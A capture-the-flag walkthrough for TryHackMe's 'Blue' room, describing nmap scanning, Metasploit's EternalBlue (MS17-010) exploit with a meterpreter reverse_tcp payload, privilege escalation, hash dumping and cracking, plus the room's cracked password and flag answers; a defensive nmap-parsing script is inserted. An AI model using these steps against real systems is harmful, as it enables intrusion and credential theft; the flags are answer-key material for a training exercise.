TryHackMe Blue | CTF Walkthrough

 

This article is about the Blue capture the flag, created by Pritam Kumar Mukhopadhyay on TryHackMe. It is a free room, and anyone can join it after logging in to the website.

Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

The video link is given at the end of the document.

This challenge teaches us how a small misconfiguration can end with your whole machine being hacked. Let’s get started.




 
RECON

Now that we have the machine’s IP, let’s scan it with nmap.

First we scan the machine for open ports, using a faster scan.
    
    

 
The next step is to identify the services and the service versions running on the open ports.

How long this takes depends on the performance of your system.
    
    


nmap ships with many scripts. To find out which vulnerabilities are present on the system, we use the "vuln" script category.

These scripts are included with nmap by default.
    

The scan result is 

    

The vuln scripts give us the details of the vulnerability present.
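Added example (not from the original article): a Python parser that reads the text output of an nmap vuln-script scan and lists the hosts whose smb-vuln-ms17-010 result is VULNERABLE, so they can be prioritized for patching. The sample output, the addresses, and the function names are constructed for illustration.

```python
import re

# Constructed sample of nmap vuln-script text output (not taken from the article).
# Addresses are documentation-range placeholders.
SAMPLE = """\
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     Risk factor: HIGH
|_smb-vuln-ms10-054: false

Nmap scan report for 192.0.2.11
PORT    STATE SERVICE
445/tcp open  microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+)$")
SCRIPT_RE = re.compile(r"^\|[ _]([a-z0-9-]+):\s*(.*)$")   # "| script-id:" header line
STATE_RE = re.compile(r"^\|[ _]\s+State:\s*(.+)$")        # indented "State:" field

def parse_vuln_findings(text):
    """Return {host: {script_id: state}} for every script block in the output."""
    findings, host, script = {}, None, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1).strip(), None
            findings[host] = {}
        elif host and (m := SCRIPT_RE.match(line)):
            script = m.group(1)
            # One-line results such as "false" have no State field; keep them as-is.
            findings[host][script] = m.group(2).strip() or "UNKNOWN"
        elif host and script and (m := STATE_RE.match(line)):
            findings[host][script] = m.group(1).strip()
    return findings

def vulnerable_hosts(findings, script_id="smb-vuln-ms17-010"):
    """Hosts whose state for script_id reports VULNERABLE (and not NOT VULNERABLE)."""
    def is_vuln(state):
        s = state.upper()
        return "VULNERABLE" in s and not s.startswith("NOT")
    return sorted(h for h, res in findings.items() if is_vuln(res.get(script_id, "")))

if __name__ == "__main__":
    for h in vulnerable_hosts(parse_vuln_findings(SAMPLE)):
        print(f"{h}: MS17-010 reported, patch or disable SMBv1")
```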


GAINING ACCESS

Now we start msfconsole.

    


We search for MS17-010.
The auxiliary/scanner modules are used to verify whether the vulnerability is present or not.
The exploit modules are used to exploit the vulnerability.

Here we have chosen auxiliary/scanner/smb/smb_ms17_010.



We need to set RHOSTS, which is the target machine's IP:
    set RHOSTS <target-ip>



Once this auxiliary/scanner module has run, we will know whether the machine is vulnerable or not.

Now comes the exploit module.

We will use the exploit exploit/windows/smb/ms17_010_eternalblue.

We set RHOSTS.
    

A payload is the malicious code delivered to the target, which runs once the exploit succeeds.

Payload used: windows/x64/meterpreter/reverse_tcp

We need to set RHOST as before, and we also need to set LHOST.
RHOST - target IP
LHOST - hacker machine IP



METERPRETER SHELL 

After running the exploit we will get something like this:


This is a Meterpreter shell, a powerful shell that we can use to dump hashes, escalate privileges, and so on.
To escalate privileges:
    meterpreter> getsystem

We will then dump the hashes using hashdump and crack them online using CrackStation.


CrackStation:
So JON-PC has the password alqfna22.

FINDING THE FLAGS

To get a shell in Meterpreter:
    meterpreter> shell
You will get a Windows shell.
    


The cmd command to display a text file in the shell:
    C:/> type <file-name>.txt

The first flag is present in C:/
    
    flag{access_the_machine}

The second flag is present in C:/windows/system32/config

    flag{sam_database_elevated_access}

The third flag is present in C:/Users/Jon/Documents
    
    flag{admin_documents_can_be_valuable}



Video link:

I hope you found this document useful. Please subscribe to my channel.

https://www.youtube.com/channel/UCVVCjPlGlfIqfCcd--JEiog


